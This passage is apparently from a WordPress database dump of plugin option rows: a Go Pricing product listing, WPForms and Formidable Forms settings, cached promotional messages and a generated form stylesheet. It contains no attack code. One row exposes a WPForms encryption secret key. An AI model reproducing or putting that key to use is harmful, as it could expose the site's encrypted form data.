Tables</h3>\r\nIt’s very easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you don’t need anything else.\r\n\r\nThis WordPress Pricing Tables supports various Media Elements like Audio, Video, Image or Map. Just give a try, we are sure you will never turn back to search more.\r\n<h3>Classic and Modern in one? Yes.</h3>\r\nIf you like traditional WordPress Pricing Tables, but you would like get much more out of it, then this rodded product is a useful tool for you. Beside the usual pricing table style Videos (Youtube, Vimeo, Screenr) and Images are also supported with optional responsivity.\r\n\r\nIt’s very easy and fast to create stunning tables and integrate them into your WordPress site using <a href=\"https://www.youtube.com/watch?v=xCAd4oC5nRs&amp;index=1&amp;list=PL9NbJzjOaEKA3pC_kQrY1UBCXBrgiejOY\" target=\"_blank\" rel=\"noopener noreferrer\">Admin Panel</a>. You will surely find the one most appropriate for you, which can be customized in a few seconds.\r\n<h3>For what other purposes can I you use this? We have some ideas.</h3>\r\nBeside traditional Pricing Tables feature the plugin is suitable also for creating Team Viewer and Compare Tables. These features can also be found in the package.\r\n<h3>Is the sytem flexible? Yes.</h3>\r\nThe responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).\r\n<h3>Can I use more than one table on my site? Yes.</h3>\r\nYou can use any number of tables on your site or even on one single page using shortcodes.\r\n\r\n<strong>Go. Just Create!.</strong>\r\n\r\n&nbsp;\";s:17:\"short_description\";s:0:\"\";s:7:\"tagline\";s:0:\"\";s:9:\"thumbnail\";s:70:\"https://api-manager.granthweb.com/wp-content/uploads/gopr_thumb_80.png\";s:3:\"url\";s:93:\"https://codecanyon.net/item/go-pricing-wordpress-responsive-pricing-tables/3725820?ref=Granth\";s:12:\"purchase_url\";s:93:\"https://codecanyon.net/item/go-pricing-wordpress-responsive-pricing-tables/3725820?ref=Granth\";s:8:\"core_min\";s:0:\"\";s:6:\"wp_min\";s:3:\"3.5\";s:6:\"wp_max\";s:5:\"5.7.2\";s:7:\"version\";s:6:\"3.3.19\";s:4:\"date\";s:10:\"18-06-2021\";}}}','yes'),
(353144,'auto_update_plugins','a:1:{i:0;s:27:\"js_composer/js_composer.php\";}','no'),
(354333,'dt_team_category_children','a:0:{}','yes'),
(356123,'wpforms_settings','a:2:{s:13:\"modern-markup\";s:1:\"0\";s:20:\"modern-markup-is-set\";b:1;}','yes'),
(356132,'_wpforms_transient_timeout_addons.json','1693175670','no'),
(356134,'_wpforms_transient_addons.json','1692570870','no'),
(356137,'_wpforms_transient_timeout_docs.json','1693175697','no'),
(356138,'_wpforms_transient_docs.json','1692570897','no'),
(356139,'_wpforms_transient_timeout_templates.json','1693175697','no'),
(356140,'_wpforms_transient_templates.json','1692570897','no'),
(356212,'wpforms_crypto_secret_key','i0Pot0rQO7+f6YNDpfZ1jZxgIg57iwiOA6UsDcNmj+4=','yes'),
(359437,'widget_frm_show_form','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(359438,'frm_options','O:11:\"FrmSettings\":34:{s:11:\"option_name\";s:11:\"frm_options\";s:4:\"menu\";N;s:7:\"mu_menu\";N;s:8:\"use_html\";N;s:10:\"jquery_css\";N;s:12:\"accordion_js\";N;s:9:\"fade_form\";N;s:7:\"old_css\";N;s:9:\"admin_bar\";N;s:11:\"success_msg\";N;s:9:\"blank_msg\";N;s:10:\"unique_msg\";N;s:11:\"invalid_msg\";N;s:10:\"failed_msg\";N;s:12:\"submit_value\";N;s:9:\"login_msg\";N;s:16:\"admin_permission\";N;s:8:\"email_to\";N;s:10:\"load_style\";N;s:12:\"custom_style\";N;s:14:\"active_captcha\";N;s:15:\"hcaptcha_pubkey\";N;s:16:\"hcaptcha_privkey\";N;s:6:\"pubkey\";N;s:7:\"privkey\";N;s:7:\"re_lang\";N;s:7:\"re_type\";N;s:6:\"re_msg\";N;s:8:\"re_multi\";N;s:6:\"no_ips\";N;s:16:\"custom_header_ip\";N;s:12:\"current_form\";i:0;s:8:\"tracking\";N;s:10:\"custom_css\";N;}','yes'),
(359439,'_transient_frm_options','O:11:\"FrmSettings\":34:{s:11:\"option_name\";s:11:\"frm_options\";s:4:\"menu\";N;s:7:\"mu_menu\";N;s:8:\"use_html\";N;s:10:\"jquery_css\";N;s:12:\"accordion_js\";N;s:9:\"fade_form\";N;s:7:\"old_css\";N;s:9:\"admin_bar\";N;s:11:\"success_msg\";N;s:9:\"blank_msg\";N;s:10:\"unique_msg\";N;s:11:\"invalid_msg\";N;s:10:\"failed_msg\";N;s:12:\"submit_value\";N;s:9:\"login_msg\";N;s:16:\"admin_permission\";N;s:8:\"email_to\";N;s:10:\"load_style\";N;s:12:\"custom_style\";N;s:14:\"active_captcha\";N;s:15:\"hcaptcha_pubkey\";N;s:16:\"hcaptcha_privkey\";N;s:6:\"pubkey\";N;s:7:\"privkey\";N;s:7:\"re_lang\";N;s:7:\"re_type\";N;s:6:\"re_msg\";N;s:8:\"re_multi\";N;s:6:\"no_ips\";N;s:16:\"custom_header_ip\";N;s:12:\"current_form\";i:0;s:8:\"tracking\";N;s:10:\"custom_css\";N;}','yes'),
(359440,'frm_inbox_cache','a:3:{s:7:\"timeout\";i:1692763103;s:5:\"value\";s:3318:\"[{\"key\":\"videos\",\"subject\":\"Did you know?\",\"message\":\"There\'s a growing collection of great video tutorials ready for you! Have a request? Let us know! Don\'t forget to subscribe so you\'ll hear about new videos too.\",\"cta\":\"<a href=\\\"https:\\/\\/formidableforms.com\\/knowledgebase\\/latest-videos\\/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=videos\\\" class=\\\"button-primary frm-button-primary\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Learn More<\\/a> <a href=\\\"#\\\" class=\\\"button-secondary frm-button-secondary frm_inbox_dismiss\\\">Dismiss<\\/a>\",\"icon\":\"frm_support_icon\",\"starts\":\"\",\"type\":\"news\",\"who\":[\"all\"]},{\"key\":\"stripe-payments\",\"subject\":\"&#91;New] Get paid easier with more Stripe payment options.\",\"message\":\"Good news! You can accept 15+ more payment options with Stripe payments. These include Cash App, ACH, and Klarna.\\r\",\"\\r\":null,\"Say goodbye to limited payments and hello to flexibility! (More flexibility = more revenue!) You already have access to these great new options. Why wait?\":null,\"cta\":\"<a href=\\\"https:\\/\\/formidableforms.com\\/stripe-payment-options-wordpress\\/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=stripe-payments\\\" class=\\\"button-primary frm-button-primary\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Learn More<\\/a> <a href=\\\"#\\\" class=\\\"button-secondary frm-button-secondary frm_inbox_dismiss\\\">Dismiss<\\/a>\",\"icon\":\"frm_price_tags_icon\",\"starts\":1690848000,\"expires\":1694476800,\"type\":\"news\",\"who\":[\"business\",\"elite\"],\"banner\":\"And easier payments mean more payments. So turn it on today.\"},{\"key\":\"stripe-payments-lite\",\"subject\":\"&#91;New] Get paid easier with more Stripe payment options.\",\"message\":\"Good news! You can accept 15+ new payment options with Stripe payments. These include Cash App, ACH, and Klarna.\\r\",\"\\r\":null,\"Say goodbye to limited payments and hello to flexibility! (Hint: more flexibility = more revenue!)\":null,\"cta\":\"<a href=\\\"https:\\/\\/formidableforms.com\\/features\\/stripe-payments-for-wordpress\\/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=stripe-payments-lite\\\" class=\\\"button-primary frm-button-primary\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Learn More<\\/a> <a href=\\\"#\\\" class=\\\"button-secondary frm-button-secondary frm_inbox_dismiss\\\">Dismiss<\\/a>\",\"icon\":\"frm_price_tags_icon\",\"starts\":1690848000,\"expires\":1694476800,\"type\":\"news\",\"who\":[\"free\",\"basic\",\"personal\",\"grandfathered\",\"expired\"]},{\"key\":\"date-calculations\",\"subject\":\"&#91;New] Calculate dates easier with a date calculator.\",\"message\":\"Date calculations have never been easier. Dynamically display vacation lengths or shipping dates based on user input (with no code needed)! Our datepicker add-on just got better.\",\"cta\":\"<a href=\\\"https:\\/\\/formidableforms.com\\/features\\/datepicker-options-for-dates\\/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=date-calculations\\\" class=\\\"button-primary frm-button-primary\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Learn More<\\/a> <a href=\\\"#\\\" class=\\\"button-secondary frm-button-secondary frm_inbox_dismiss\\\">Dismiss<\\/a>\",\"icon\":\"frm_calculator_icon\",\"starts\":1692057600,\"expires\":1694476800,\"type\":\"news\",\"who\":[\"free\",\"basic\",\"personal\",\"business\",\"elite\",\"grandfathered\",\"expired\",\"all\"]}]\";s:7:\"version\";s:5:\"6.4.1\";}','no'),
(359441,'frm_inbox','a:4:{s:6:\"videos\";a:10:{s:7:\"message\";s:160:\"There\'s a growing collection of great video tutorials ready for you! Have a request? Let us know! Don\'t forget to subscribe so you\'ll hear about new videos too.\";s:7:\"subject\";s:13:\"Did you know?\";s:4:\"icon\";s:16:\"frm_support_icon\";s:3:\"cta\";s:334:\"<a href=\"https://formidableforms.com/knowledgebase/latest-videos/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=videos\" class=\"button-primary frm-button-primary\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a> <a href=\"#\" class=\"button-secondary frm-button-secondary frm_inbox_dismiss\">Dismiss</a>\";s:7:\"expires\";b:0;s:3:\"who\";a:1:{i:0;s:3:\"all\";}s:4:\"type\";s:4:\"news\";s:3:\"key\";s:6:\"videos\";s:6:\"starts\";s:0:\"\";s:7:\"created\";i:1692741503;}s:15:\"stripe-payments\";a:13:{s:7:\"message\";s:114:\"Good news! You can accept 15+ more payment options with Stripe payments. These include Cash App, ACH, and Klarna.\r\";s:7:\"subject\";s:59:\"&#91;New] Get paid easier with more Stripe payment options.\";s:4:\"icon\";s:19:\"frm_price_tags_icon\";s:3:\"cta\";s:348:\"<a href=\"https://formidableforms.com/stripe-payment-options-wordpress/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=stripe-payments\" class=\"button-primary frm-button-primary\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a> <a href=\"#\" class=\"button-secondary frm-button-secondary frm_inbox_dismiss\">Dismiss</a>\";s:7:\"expires\";i:1694476800;s:3:\"who\";a:2:{i:0;s:8:\"business\";i:1;s:5:\"elite\";}s:4:\"type\";s:4:\"news\";s:3:\"key\";s:15:\"stripe-payments\";s:1:\"\r\";N;s:154:\"Say goodbye to limited payments and hello to flexibility! (More flexibility = more revenue!) You already have access to these great new options. Why wait?\";N;s:6:\"starts\";i:1690848000;s:6:\"banner\";s:60:\"And easier payments mean more payments. So turn it on today.\";s:7:\"created\";i:1692741503;}s:20:\"stripe-payments-lite\";a:12:{s:7:\"message\";s:113:\"Good news! You can accept 15+ new payment options with Stripe payments. These include Cash App, ACH, and Klarna.\r\";s:7:\"subject\";s:59:\"&#91;New] Get paid easier with more Stripe payment options.\";s:4:\"icon\";s:19:\"frm_price_tags_icon\";s:3:\"cta\";s:359:\"<a href=\"https://formidableforms.com/features/stripe-payments-for-wordpress/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=stripe-payments-lite\" class=\"button-primary frm-button-primary\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a> <a href=\"#\" class=\"button-secondary frm-button-secondary frm_inbox_dismiss\">Dismiss</a>\";s:7:\"expires\";i:1694476800;s:3:\"who\";a:5:{i:0;s:4:\"free\";i:1;s:5:\"basic\";i:2;s:8:\"personal\";i:3;s:13:\"grandfathered\";i:4;s:7:\"expired\";}s:4:\"type\";s:4:\"news\";s:3:\"key\";s:20:\"stripe-payments-lite\";s:1:\"\r\";N;s:98:\"Say goodbye to limited payments and hello to flexibility! (Hint: more flexibility = more revenue!)\";N;s:6:\"starts\";i:1690848000;s:7:\"created\";i:1692741503;}s:17:\"date-calculations\";a:10:{s:7:\"message\";s:178:\"Date calculations have never been easier. Dynamically display vacation lengths or shipping dates based on user input (with no code needed)! Our datepicker add-on just got better.\";s:7:\"subject\";s:56:\"&#91;New] Calculate dates easier with a date calculator.\";s:4:\"icon\";s:19:\"frm_calculator_icon\";s:3:\"cta\";s:355:\"<a href=\"https://formidableforms.com/features/datepicker-options-for-dates/?utm_source=WordPress&utm_medium=inbox&utm_campaign=liteplugin&utm_content=date-calculations\" class=\"button-primary frm-button-primary\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a> <a href=\"#\" class=\"button-secondary frm-button-secondary frm_inbox_dismiss\">Dismiss</a>\";s:7:\"expires\";i:1694476800;s:3:\"who\";a:8:{i:0;s:4:\"free\";i:1;s:5:\"basic\";i:2;s:8:\"personal\";i:3;s:8:\"business\";i:4;s:5:\"elite\";i:5;s:13:\"grandfathered\";i:6;s:7:\"expired\";i:7;s:3:\"all\";}s:4:\"type\";s:4:\"news\";s:3:\"key\";s:17:\"date-calculations\";s:6:\"starts\";i:1692057600;s:7:\"created\";i:1692741503;}}','no'),
(359443,'frm_welcome_redirect','6.4.1','no'),
(359448,'frm_db_version','6.4.1-98','yes'),
(359449,'frm_last_style_update','8222158','yes'),
(359450,'frmpro_css','/* WARNING: Any changes made to this file will be lost when your Formidable settings are updated */\n.with_frm_style{--form-width:100%;--form-align:left;--direction:ltr;--fieldset:0px;--fieldset-color:#000000;--fieldset-padding:0 0 15px 0;--fieldset-bg-color:transparent;--title-size:40px;--title-color:#444444;--title-margin-top:10px;--title-margin-bottom:60px;--form-desc-size:14px;--form-desc-color:#666666;--form-desc-margin-top:10px;--form-desc-margin-bottom:25px;--form-desc-padding:0;--font-size:15px;--label-color:#3f4b5b;--weight:normal;--position:none;--align:left;--width:150px;--required-color:#B94A48;--required-weight:bold;--label-padding:0 0 3px 0;--description-font-size:12px;--description-color:#666666;--description-weight:normal;--description-style:normal;--description-align:left;--description-margin:0;--field-font-size:14px;--field-height:32px;--line-height:32px;--field-width:100%;--auto-width:100%;--field-pad:6px 10px;--field-margin:20px;--field-weight:normal;--text-color:#555555;--border-color:#BFC3C8;--field-border-width:1px;--field-border-style:solid;--bg-color:#ffffff;--bg-color-active:#ffffff;--border-color-active:#66afe9;--text-color-error:#444444;--bg-color-error:#ffffff;--border-color-error:#B94A48;--border-width-error:1px;--border-style-error:solid;--bg-color-disabled:#ffffff;--border-color-disabled:#E5E5E5;--text-color-disabled:#A1A1A1;--radio-align:block;--check-align:block;--check-font-size:13px;--check-label-color:#444444;--check-weight:normal;--section-font-size:18px;--section-color:#444444;--section-weight:bold;--section-pad:15px 0 3px 0;--section-mar-top:15px;--section-mar-bottom:30px;--section-bg-color:transparent;--section-border-color:#e8e8e8;--section-border-width:2px;--section-border-style:solid;--section-border-loc:-top;--collapse-pos:after;--repeat-icon-color:#ffffff;--submit-font-size:15px;--submit-width:auto;--submit-height:auto;--submit-bg-color:#579AF6;--submit-border-color:#579AF6;--submit-border-width:1px;--submit-text-color:#ffffff;--submit-weight:normal;--submit-border-radius:4px;--submit-margin:10px;--submit-padding:10px 20px;--submit-shadow-color:#eeeeee;--submit-hover-bg-color:#efefef;--submit-hover-color:#444444;--submit-hover-border-color:#cccccc;--submit-active-bg-color:#efefef;--submit-active-color:#444444;--submit-active-border-color:#cccccc;--border-radius:4px;--error-bg:#F2DEDE;--error-border:#EBCCD1;--error-text:#B94A48;--error-font-size:14px;--success-bg-color:#DFF0D8;--success-border-color:#D6E9C6;--success-text-color:#468847;--success-font-size:14px;--progress-bg-color:#eaeaea;--progress-active-color:#ffffff;--progress-active-bg-color:#579AF6;--progress-color:#3f4b5b;--progress-border-color:#E5E5E5;--progress-border-size:2px;--progress-size:24px;--box-shadow:0 1px 1px rgba(0, 0, 0, 0.075) inset;}.frm_hidden,.frm_add_form_row.frm_hidden,.frm_remove_form_row.frm_hidden,.with_frm_style .frm_button.frm_hidden{display:none;}.with_frm_style,.with_frm_style form,.with_frm_style .frm-show-form div.frm_description p{text-align:left;text-align:var(--form-align);}input:-webkit-autofill {-webkit-box-shadow: 0 0 0 30px white inset;}.with_frm_style .frm-show-form div.frm_description p{font-size:14px;font-size:var(--form-desc-size);color:#666666;color:var(--form-desc-color);margin-top:10px;margin-top:var(--form-desc-margin-top);margin-bottom:25px;margin-bottom:var(--form-desc-margin-bottom);padding:0;padding:var(--form-desc-padding);}form input.frm_verify{position:absolute;left:-3000px;}.with_frm_style fieldset{min-width:0;display: block; }.with_frm_style fieldset fieldset{border:none;margin:0;padding:0;background-color:transparent;}.with_frm_style .frm_form_fields > fieldset{border-width:0px;border-width:var(--fieldset);border-style:solid;border-color:#000000;border-color:var(--fieldset-color);margin:0;padding:0 0 15px 0;padding:var(--fieldset-padding);background-color:transparent;background-color:var(--fieldset-bg-color);}legend.frm_hidden{display:none !important;}.with_frm_style .frm_form_fields{opacity:1;transition: opacity 0.1s linear;}.with_frm_style .frm_doing_ajax{opacity:.5;}.frm_transparent{color:transparent;}.with_frm_style legend + h3,.with_frm_style h3.frm_form_title{font-size:40px;font-size:var(--title-size);color:#444444;color:var(--title-color);margin-top:10px;margin-top:var(--title-margin-top);margin-bottom:60px;margin-bottom:var(--title-margin-bottom);}.with_frm_style .frm_form_field.frm_html_container,.with_frm_style .frm_form_field .frm_show_it{color:#666666;color:var(--form-desc-color);}.with_frm_style .frm_form_field.frm_html_container{font-size:14px;font-size:var(--form-desc-size);}.with_frm_style .frm_form_field .frm_show_it{font-size:14px;font-size:var(--field-font-size);font-weight:normal;font-weight:var(--field-weight);}.with_frm_style .frm_required{color:#B94A48;color:var(--required-color);font-weight:bold;font-weight:var(--required-weight);}.with_frm_style input[type=text],.with_frm_style input[type=password],.with_frm_style input[type=email],.with_frm_style input[type=number],.with_frm_style input[type=url],.with_frm_style input[type=tel],.with_frm_style input[type=search],.with_frm_style select,.with_frm_style textarea,.with_frm_style .frm-card-element.StripeElement,.with_frm_style .chosen-container{font-family:var(--font);font-size:14px;font-size:var(--field-font-size);margin-bottom:0;}.with_frm_style textarea{vertical-align:top;height:auto;}.with_frm_style input[type=text],.with_frm_style input[type=password],.with_frm_style input[type=email],.with_frm_style input[type=number],.with_frm_style input[type=url],.with_frm_style input[type=tel],.with_frm_style input[type=phone],.with_frm_style input[type=search],.with_frm_style select,.with_frm_style textarea,.frm_form_fields_style,.with_frm_style .frm_scroll_box .frm_opt_container,.frm_form_fields_active_style,.frm_form_fields_error_style,.with_frm_style .frm-card-element.StripeElement,.with_frm_style .chosen-container-multi .chosen-choices,.with_frm_style .chosen-container-single .chosen-single{color:#555555;color:var(--text-color);background-color:#ffffff;background-color:var(--bg-color);border-color:#BFC3C8;border-color:var(--border-color);border-width:1px;border-width:var(--field-border-width);border-style:solid;border-style:var(--field-border-style);-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;border-radius:var(--border-radius);width:100%;width:var(--field-width);max-width:100%;font-size:14px;font-size:var(--field-font-size);padding:6px 10px;padding:var(--field-pad);-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;outline:none;font-weight:normal;font-weight:var(--field-weight);box-shadow:var(--box-shadow);}.with_frm_style input[type=radio],.with_frm_style input[type=checkbox]{border-color:#BFC3C8;border-color:var(--border-color);box-shadow:var(--box-shadow);float: none;}.with_frm_style input[type=radio]:after,.with_frm_style input[type=checkbox]:after {display: none; }.with_frm_style input[type=text],.with_frm_style input[type=password],.with_frm_style input[type=email],.with_frm_style input[type=number],.with_frm_style input[type=url],.with_frm_style input[type=tel],.with_frm_style input[type=file],.with_frm_style input[type=search],.with_frm_style select,.with_frm_style .frm-card-element.StripeElement{height:32px;height:var(--field-height);line-height:1.3;}.with_frm_style select[multiple=multiple]{height:auto;}.input[type=file].frm_transparent:focus,.with_frm_style input[type=file]{background-color:transparent;border:none;outline:none;box-shadow:none;}.with_frm_style input[type=file]{color:#555555;color:var(--text-color);padding:0px;font-size:14px;font-size:var(--field-font-size);display:initial;}.with_frm_style input[type=file].frm_transparent{color:transparent;}.with_frm_style .wp-editor-wrap{width:100%;width:var(--field-width);max-width:100%;}.with_frm_style .wp-editor-container textarea{border:none;box-shadow:none !important;}.with_frm_style .mceIframeContainer{background-color:#ffffff;background-color:var(--bg-color);}.with_frm_style select{width:100%;width:var(--auto-width);max-width:100%;background-position-y: center;}.with_frm_style input[disabled],.with_frm_style select[disabled],.with_frm_style textarea[disabled],.with_frm_style input[readonly],.with_frm_style select[readonly],.with_frm_style textarea[readonly]{background-color:#ffffff;background-color:var(--bg-color-disabled);color:#A1A1A1;color:var(--text-color-disabled);border-color:#E5E5E5;border-color:var(--border-color-disabled);}.frm_preview_page:before{content:normal !important;}.frm_preview_page{padding:25px;}.with_frm_style .frm_primary_label{max-width:100%;font-size:15px;font-size:var(--font-size);color:#3f4b5b;color:var(--label-color);font-weight:normal;font-weight:var(--weight);text-align:left;text-align:var(--align);padding:0 0 3px 0;padding:var(--label-padding);margin:0;width:auto;display:block;}.with_frm_style .frm_top_container .frm_primary_label,.with_frm_style .frm_hidden_container .frm_primary_label,.with_frm_style .frm_pos_top{display:block;float:none;width:auto;}.with_frm_style .frm_inline_container .frm_primary_label{margin-right:10px;}.with_frm_style .frm_right_container .frm_primary_label,.with_frm_style .frm_pos_right{display:inline;float:right;margin-left:10px;}.with_frm_style .frm_pos_center {text-align: center;}.with_frm_style .frm_none_container .frm_primary_label,.with_frm_style .frm_pos_none,.frm_pos_none,.frm_none_container .frm_primary_label{display:none;}.with_frm_style .frm_section_heading.frm_hide_section{margin-top:0 !important;}.with_frm_style .frm_hidden_container .frm_primary_label,.with_frm_style .frm_pos_hidden,.frm_hidden_container .frm_primary_label{visibility:hidden;white-space:nowrap;}.frm_visible{opacity:1;}.with_frm_style .frm_inside_container {position: relative;padding-top: 16px;padding-top: calc(0.5 * var(--field-height));}.with_frm_style .frm_inside_container > input,.with_frm_style .frm_inside_container > select,.with_frm_style .frm_inside_container > textarea {display: block;}.with_frm_style .frm_inside_container > input::-moz-placeholder,.with_frm_style .frm_inside_container > textarea::-moz-placeholder {opacity: 0 !important;transition: opacity 0.3s ease-in;}.with_frm_style .frm_inside_container > input:-ms-input-placeholder,.with_frm_style .frm_inside_container > textarea:-ms-input-placeholder {opacity: 0;transition: opacity 0.3s ease-in;}.with_frm_style .frm_inside_container > input::placeholder,.with_frm_style .frm_inside_container > textarea::placeholder {opacity: 0;transition: opacity 0.3s ease-in;}.with_frm_style .frm_inside_container > label {transition: all 0.3s ease-in;position: absolute;top: 17px;top: calc(1px + .5 * var(--field-height));left: 3px;width: 100%;line-height: 1.3;text-overflow: ellipsis;overflow: hidden;white-space: nowrap;padding: 6px 10px;padding: var(--field-pad);font-size: 14px;font-size: var(--field-font-size);font-weight: normal;font-weight: var(--field-weight);-ms-pointer-events: none;pointer-events: none;}.with_frm_style.frm_style_lines-no-boxes .frm_inside_container > label {line-height: 1;}.with_frm_style .frm_inside_container.frm_label_float_top > label {top: 0;left: 0;padding: 0;font-size: 12px;font-size: calc(0.85 * var(--field-font-size));}.with_frm_style .frm_inside_container.frm_label_float_top > input::-moz-placeholder,.with_frm_style .frm_inside_container.frm_label_float_top > textarea::-moz-placeholder {opacity: 1 !important;transition: opacity 0.3s ease-in;}.with_frm_style .frm_inside_container.frm_label_float_top > input:-ms-input-placeholder,.with_frm_style .frm_inside_container.frm_label_float_top > textarea:-ms-input-placeholder {opacity: 1;transition: opacity 0.3s ease-in;}.with_frm_style .frm_inside_container.frm_label_float_top > input::placeholder,.with_frm_style .frm_inside_container.frm_label_float_top > textarea::placeholder {opacity: 1;transition: opacity 0.3s ease-in;}.with_frm_style .frm_description,.with_frm_style .frm_pro_max_limit_desc{clear:both;}.with_frm_style input[type=number][readonly]{-moz-appearance: textfield;}.with_frm_style select[multiple=\"multiple\"]{height:auto;line-height:normal;}.with_frm_style .frm_catlevel_2,.with_frm_style .frm_catlevel_3,.with_frm_style .frm_catlevel_4,.with_frm_style .frm_catlevel_5{margin-left:18px;}.with_frm_style .wp-editor-container{border:1px solid #e5e5e5;}.with_frm_style .quicktags-toolbar input{font-size:12px !important;}.with_frm_style .wp-editor-container textarea{border:none;}.with_frm_style .auto_width #loginform input,.with_frm_style .auto_width input,.with_frm_style input.auto_width,.with_frm_style select.auto_width,.with_frm_style textarea.auto_width{width:auto;}.with_frm_style .frm_repeat_buttons{white-space:nowrap;}.with_frm_style .frm_button{text-decoration:none !important;;border:1px solid #eee;display:inline-block;padding:10px 20px;padding:var(--submit-padding);-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;border-radius:var(--border-radius);font-size:15px;font-size:var(--submit-font-size);font-weight:normal;font-weight:var(--submit-weight);color:#ffffff;color:var(--submit-text-color);background:#579AF6;background:var(--submit-bg-color);border-width:1px;border-width:var(--submit-border-width);border-color:#579AF6;border-color:var(--submit-border-color);height:auto;height:var(--submit-height);}.with_frm_style .frm_button.frm_inverse{color:var(--submit-bg-color);background:var(--submit-text-color);}.with_frm_style .frm_submit{clear:both;}.frm_inline_form .frm_form_field,.frm_inline_form .frm_submit{grid-column: span 1 / span 1;}.frm_inline_form .frm_submit{margin:0;}.frm_submit.frm_inline_submit input[type=submit],.frm_submit.frm_inline_submit button,.frm_inline_form .frm_submit input[type=submit],.frm_inline_form .frm_submit button{margin-top:0;}.with_frm_style.frm_center_submit .frm_submit{text-align:center;}.with_frm_style .frm_inline_success .frm_submit{display: flex;flex-direction: row;align-items: center;margin: 0;}.with_frm_style .frm_inline_success .frm_submit .frm_message{flex: 1;margin: 0;padding-left: 10px;}.with_frm_style .frm_inline_success.frm_alignright_success .frm_submit .frm_message{text-align: right;}.with_frm_style.frm_center_submit .frm_submit input[type=submit],.with_frm_style.frm_center_submit .frm_submit input[type=button],.with_frm_style.frm_center_submit .frm_submit button{margin-bottom:8px !important;}.with_frm_style .frm-edit-page-btn,.with_frm_style .frm_submit input[type=submit],.with_frm_style .frm_submit input[type=button],.with_frm_style .frm_submit button{-webkit-appearance: none;cursor: pointer;}.with_frm_style.frm_center_submit .frm_submit .frm_ajax_loading{display: block;margin: 0 auto;}.with_frm_style .frm_loading_prev .frm_ajax_loading,.with_frm_style .frm_loading_form .frm_ajax_loading{visibility:visible !important;}.with_frm_style .frm_loading_prev .frm_prev_page,.with_frm_style .frm_loading_form .frm_button_submit {position: relative;opacity: .8;color: transparent !important;text-shadow: none !important;}.with_frm_style .frm_loading_prev .frm_prev_page:hover,.with_frm_style .frm_loading_prev .frm_prev_page:active,.with_frm_style .frm_loading_prev .frm_prev_page:focus,.with_frm_style .frm_loading_form .frm_button_submit:hover,.with_frm_style .frm_loading_form .frm_button_submit:active,.with_frm_style .frm_loading_form .frm_button_submit:focus {cursor: not-allowed;color: transparent;outline: none !important;box-shadow: none;}.with_frm_style .frm_loading_prev .frm_prev_page::before,.with_frm_style .frm_loading_form .frm_button_submit:before {content: \'\';display: inline-block;position: absolute;background: transparent;border: 1px solid #fff;border-top-color: transparent;border-left-color: transparent;border-radius: 50%;box-sizing: border-box;top: 50%;left: 50%;margin-top: -10px;margin-left: -10px;width: 20px;height: 20px;-webkit-animation: spin 2s linear infinite;-moz-animation:spin 2s linear infinite;-o-animation:  spin 2s linear infinite;animation: spin 2s linear infinite;}.frm_style_formidable-style.with_frm_style{}.frm_forms.frm_style_formidable-style.with_frm_style{max-width:100%;direction:ltr;}.frm_style_formidable-style.with_frm_style .frm_icon_font{color:#3f4b5b;}.frm_style_formidable-style.with_frm_style .frm_icon_font.frm_minus_icon:before{content:\"\\e600\";}.frm_style_formidable-style.with_frm_style .frm_icon_font.frm_plus_icon:before{content:\"\\e602\";}.frm_style_formidable-style.with_frm_style .frm_icon_font.frm_minus_icon:before,.frm_style_formidable-style.with_frm_style .frm_icon_font.frm_plus_icon:before{color:#ffffff;vertical-align:middle;}.frm_style_formidable-style.with_frm_style .frm_trigger.active .frm_icon_font.frm_arrow_icon:before{content:\"\\e62d\";color:#444444;}.frm_style_formidable-style.with_frm_style .frm_trigger .frm_icon_font.frm_arrow_icon:before{content:\"\\e62a\";color:#444444;}.frm_style_formidable-style.with_frm_style .form-field{margin-bottom:20px;}.frm_style_formidable-style.with_frm_style .form-field.frm_section_heading{margin-bottom:0;}.frm_style_formidable-style.with_frm_style p.description,.frm_style_formidable-style.with_frm_style div.description,.frm_style_formidable-style.with_frm_style div.frm_description,.frm_style_formidable-style.with_frm_style .frm-show-form > div.frm_description,.frm_style_formidable-style.with_frm_style .frm_error,.frm_style_formidable-style.with_frm_style .frm_pro_max_limit_desc{padding:0;font-size:12px;color:#666666;font-weight:normal;text-align:left;font-style:normal;max-width:100%;}.frm_style_formidable-style.with_frm_style .frm_form_field.frm_left_container{grid-template-columns: 150px auto;}.frm_style_formidable-style.with_frm_style .frm_form_field.frm_right_container{grid-template-columns: auto 150px;}.frm_form_field.frm_right_container{grid-template-columns: auto 25%;}.frm_style_formidable-style.with_frm_style .frm_inline_container.frm_dynamic_select_container .frm_data_container,.frm_style_formidable-style.with_frm_style .frm_inline_container.frm_dynamic_select_container .frm_opt_container{display:inline;}.frm_style_formidable-style.with_frm_style .frm_pos_right{display:inline;width:150px;}.frm_style_formidable-style.with_frm_style .frm_none_container .frm_primary_label,.frm_style_formidable-style.with_frm_style .frm_pos_none{display:none;}.frm_style_formidable-style.with_frm_style input::placeholder,.frm_style_formidable-style.with_frm_style textarea::placeholder{color: #A1A1A1;}.frm_style_formidable-style.with_frm_style input::-webkit-input-placeholder,.frm_style_formidable-style.with_frm_style textarea::-webkit-input-placeholder{color: #A1A1A1;}.frm_style_formidable-style.with_frm_style input::-moz-placeholder,.frm_style_formidable-style.with_frm_style textarea::-moz-placeholder{color: 